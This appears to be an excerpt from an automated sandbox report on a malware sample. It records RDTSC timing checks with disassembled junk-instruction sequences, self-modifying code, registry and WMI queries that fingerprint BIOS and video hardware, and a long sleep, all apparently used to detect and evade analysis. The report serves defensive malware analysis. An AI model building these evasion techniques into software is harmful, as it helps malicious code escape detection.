              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F605BE second address: 4F605C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F605C4 second address: 4F605C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F605C8 second address: 4F605CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0EA7 second address: 2CC0EE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FBF315524BFh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBF315524C0h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0EE2 second address: 2CC0EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0EE8 second address: 2CC0EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0EEE second address: 2CC0EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F609A3 second address: 4F609EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FBF315524C1h 0x00000015 and ecx, 33A52786h 0x0000001b jmp 00007FBF315524C1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F609EB second address: 4F609F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F609F1 second address: 4F609F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F609F5 second address: 4F609F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F609F9 second address: 4F60A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBF315524C6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007FBF315524BEh 0x00000015 push ecx 0x00000016 mov ecx, ebx 0x00000018 pop edi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov dx, si 0x00000020 pushfd 0x00000021 jmp 00007FBF315524C2h 0x00000026 or si, 2EE8h 0x0000002b jmp 00007FBF315524BBh 0x00000030 popfd 0x00000031 popad 0x00000032 cmp dword ptr [75AB459Ch], 05h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FBF315524C5h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60A76 second address: 4F60A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFA203B1BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60A97 second address: 4F60A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60A9B second address: 4F60AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60AA1 second address: 4F60AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 mov ah, bl 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60B03 second address: 4F60B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60B09 second address: 4F60B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4BBD4402h 0x00000010 jmp 00007FBF315524C0h 0x00000015 call 00007FBFA20474F6h 0x0000001a push 75A52B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75AB4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 movsx edi, cx 0x00000065 call 00007FBF315524C6h 0x0000006a pop esi 0x0000006b popad 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60B55 second address: 4F60B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF3154D253h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60B82 second address: 4F60B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60B86 second address: 4F60B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60BFD second address: 4F60C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60C03 second address: 4F60C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70AF4 second address: 4F70B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov edx, 5F5F3A5Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FBF315524C0h 0x00000015 xor eax, 79A92B28h 0x0000001b jmp 00007FBF315524BBh 0x00000020 popfd 0x00000021 mov si, 381Fh 0x00000025 popad 0x00000026 mov dword ptr [esp], esi 0x00000029 jmp 00007FBF315524C2h 0x0000002e mov esi, dword ptr [ebp+0Ch] 0x00000031 pushad 0x00000032 push ecx 0x00000033 pushfd 0x00000034 jmp 00007FBF315524BDh 0x00000039 adc ax, 09F6h 0x0000003e jmp 00007FBF315524C1h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70B6F second address: 4F70B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70B73 second address: 4F70BC5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF315524BDh 0x00000008 add si, BB56h 0x0000000d jmp 00007FBF315524C1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 mov esi, 767DD663h 0x0000001e mov ah, 75h 0x00000020 popad 0x00000021 je 00007FBFA202FCC5h 0x00000027 jmp 00007FBF315524BBh 0x0000002c cmp dword ptr [75AB459Ch], 05h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70BC5 second address: 4F70BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70BCA second address: 4F70BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov bx, 674Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FBFA2047D76h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF315524BCh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70BEB second address: 4F70BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3154D24Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70BFD second address: 4F70C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FBF315524BCh 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBF315524C7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612E3D0 second address: 612E3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612E3D4 second address: 612E3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A4D06 second address: 62A4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62982F5 second address: 629830E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FBF315524C4h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3EAE second address: 62A3EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBF3154D24Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3EC7 second address: 62A3ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ecx 0x00000009 jo 00007FBF315524B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3ED8 second address: 62A3EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FBF3154D246h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A4443 second address: 62A4467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF315524C0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 jp 00007FBF315524B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A5F3D second address: 62A5F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A5F9F second address: 62A5FA9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF315524BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A5FA9 second address: 62A5FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBF3154D24Ah 0x0000000c nop 0x0000000d or ch, 0000007Bh 0x00000010 add dl, FFFFFF96h 0x00000013 push 00000000h 0x00000015 jl 00007FBF3154D253h 0x0000001b push AD8D45D6h 0x00000020 push ebx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A5FE1 second address: 62A606B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 5272BAAAh 0x0000000d push ebx 0x0000000e mov edx, 2D98DDEBh 0x00000013 pop ecx 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D20C9h], ecx 0x0000001c mov dx, 6CA7h 0x00000020 push 00000000h 0x00000022 call 00007FBF315524BDh 0x00000027 jns 00007FBF315524B9h 0x0000002d pop esi 0x0000002e push 00000003h 0x00000030 clc 0x00000031 push 9C4FF4E0h 0x00000036 jmp 00007FBF315524C5h 0x0000003b xor dword ptr [esp], 5C4FF4E0h 0x00000042 mov edx, esi 0x00000044 lea ebx, dword ptr [ebp+1244BE66h] 0x0000004a mov edi, dword ptr [ebp+122D2A57h] 0x00000050 sbb di, 9F11h 0x00000055 xchg eax, ebx 0x00000056 jp 00007FBF315524C3h 0x0000005c jmp 00007FBF315524BDh 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A606B second address: 62A606F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A60ED second address: 62A60F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A60F2 second address: 62A612E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ch, dl 0x0000000f mov di, ax 0x00000012 push 00000000h 0x00000014 call 00007FBF3154D24Ah 0x00000019 mov edx, 1ED6F689h 0x0000001e pop esi 0x0000001f push 6D7D530Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FBF3154D251h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A61EB second address: 62A61F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A62B2 second address: 62A62BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A62BC second address: 62A62D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A62D0 second address: 62A6311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnl 00007FBF3154D258h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBF3154D259h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A6311 second address: 62A6316 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6232 second address: 62C6237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6237 second address: 62C623F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C623F second address: 62C6243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C683E second address: 62C6842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6842 second address: 62C6848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C69C7 second address: 62C69DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FBF315524B6h 0x00000009 jo 00007FBF315524B6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C69DA second address: 62C69E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FBF3154D246h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C69E7 second address: 62C69EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6B70 second address: 62C6B9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBF3154D24Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBF3154D258h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6B9A second address: 62C6BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C6BA0 second address: 62C6BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C7296 second address: 62C729A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C7518 second address: 62C7531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3154D254h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD16C second address: 62CD17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnc 00007FBF315524B6h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD17E second address: 62CD188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD188 second address: 62CD1B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FBF315524C6h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC238 second address: 62CC23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC23E second address: 62CC256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF315524C1h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD277 second address: 62CD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD281 second address: 62CD2AE instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FBF315524BAh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push ecx 0x00000018 jns 00007FBF315524B6h 0x0000001e pop ecx 0x0000001f pop eax 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD2AE second address: 62CD2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD2B2 second address: 62CD2CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD2CD second address: 62CD2F6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF3154D24Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FBF3154D250h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD2F6 second address: 62CD2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD46A second address: 62CD46F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CD46F second address: 62CD481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF315524B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D1C2E second address: 62D1C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D1C33 second address: 62D1C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FBF315524B6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D1C42 second address: 62D1C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FBF3154D246h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D1C50 second address: 62D1C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A8BEF6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A6B7C2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AED60C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 612DC16 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62CD0B4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62CB91C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6355E57 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7948Thread sleep time: -270000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
